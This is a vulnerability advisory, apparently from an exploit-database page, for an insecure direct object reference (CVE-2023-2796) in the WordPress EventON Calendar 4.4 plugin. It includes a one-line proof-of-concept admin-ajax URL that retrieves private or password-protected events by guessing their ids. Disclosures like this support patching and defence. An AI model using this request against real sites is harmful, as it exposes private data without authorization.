WordPress EventON Calendar 4.4 Insecure Direct Object Reference

2023.08.06

Credit: Miguel Santareno

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2023-2796

CWE: CWE-862

# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-2796
# 1. Description
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress EventON Calendar 4.4 Insecure Direct Object Reference

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.